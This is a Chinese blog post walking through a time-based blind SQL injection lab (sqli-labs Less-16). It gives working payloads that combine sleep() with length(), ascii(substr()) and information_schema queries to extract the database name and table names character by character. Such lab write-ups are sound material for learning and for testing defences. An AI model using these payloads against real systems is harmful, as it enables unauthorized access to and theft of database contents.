首页 > 数据库 >SQL 时间盲注 (injection 第十六关)

SQL 时间盲注 (injection 第十六关)

时间:2024-08-22 18:50:55浏览次数:12  
标签:数据库 length 确定 sleep SQL 攻击者 injection 盲注

简介


        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       

SQL注入的一个简要流程:


1、打开目标靶场

2、选择less - 16

3、确定网站可以注入的参数

本关可以直接在输入框中搜索 

4、判断闭合方式   

本关为 1") #

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如:   1") and if(length(database()=7),sleep(8),1) #

发现没有时间延迟,则数据库长度不为7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

  1") and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表


查询第一张表的第一个字符

1") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

标签:数据库,length,确定,sleep,SQL,攻击者,injection,盲注
From: https://blog.csdn.net/baishiqi12/article/details/141298747

相关文章

  • Sqlserver修改连接密码
    使用SQLServerManagementStudio(SSMS):打开SSMS并连接到您的SQLServer实例。在“对象资源管理器”中,展开“安全性”文件夹。在“登录”对话框中,选择要更改密码的登录名。点击“密码”旁边的“...”按钮,输入新密码和确认密码。点击“确定”保存更改。使用T......
  • [Mysql]执行一条语句的过程
    执行一条select语句,期间发生了什么?学习SQL的时候,大家肯定第一个先学到的就是select查询语句了,比如下面这句查询语句://在product表中,查询id=1的记录select*fromproductwhereid=1;但是有没有想过,MySQL执行一条select查询语句,在MySQL中期间发生了什么?......
  • MySql中常用的sql语句大全(工作常用篇)
    1.DDL1.1操作数据库--创建库createdatabase库名;--创建库时判断库是否存在,不存在则创建createdatabaseifnoexists库名;--查看所有数据库showdatabases;--使用指定数据库use库名;--查看当前指定数据库包含的数据表showtables;--查看数据库的结......
  • 如何避免Mysql RR 隔离级别下的 INSERT 死锁
    背景       我们公司架构师,在使用Mysql做分布式锁的时候,因insert唯一键冲突,造成死锁。引起我对这部分知识点的兴趣和研究。       死锁日志的详细信息如下:LATESTDETECTEDDEADLOCK------------------------2024-08-1916:32:450x7f92b0ca2700***......
  • MySQL高可用方案
    1.https://vitess.io/zh/2.orchestrator主从方案基于二进制日志文件和位置的复制原理:从服务器根据主服务器的二进制日志(binlog)中的文件名和位置进行复制。配置:在从服务器上配置主服务器的binlog文件名和位置。故障转移:手动介入:一旦主服务器故障,需要手动重新配置新的主服......
  • Mysql
    1、时间差(秒级别)selectcreatime,updatime,TIMESTAMPDIFF(MICROSECOND,creatime,updatime)/1000000  AS time_diff  from  表名whereapplicationlike'%17%'and creatime>"2024-06-1414:41:29.803"andclient_idin("LSW12345678901223") ......
  • ado.net 操作sqlite
    新建控制台项目安装nuget包Microsoft.Data.Sqlite数据库名字和链接stringdbName="test.db";SqliteConnection?connection=null;try{//创建链接connection=newSqliteConnection($"DataSource={dbName}");//打开链接connection.Open();......
  • 【溯源系列】使用Wireshark分析日志文件:发现有人对网站进行了SQL注入,分析日志找到该IP
    工具Wireshark某公司安全工程师在维护网站时发现有人对网站进行了SQL注入,分析日志找到该IP地址。要点SQL.log文件主要显示具体的sql语句】access.log文件主要是记录web页面操作数据库的请求解题很简单,直接打开access.log文件,一步到位,检索sql注入的常见关键词select、un......
  • Pycharm连接mysql数据库
    importpymysql1、需要使用pymysql在三方库;importpymysqlconfig={'user':'investbank_newforp','password':'m@H2wp4B@7e9','host':'192.168.154.241','port':15213,......
  • 安装MySQL报错ERROR 2003 (HY000): Can‘t connect to MySQL server on ‘localhost:3
    今天要在本地装个mysql,发现mysql-5.7.19-winx64版总是报错由于找不到MSVCP120.dll,无法继续执行代码。重新安装程序可能会解决此问题。,去微软官网找到了最新的VisualC++RedistributableforVisualStudio,下载后发现还是不停地报错。怀疑是系统不兼容,没办法只好安装mysql-8.0.37......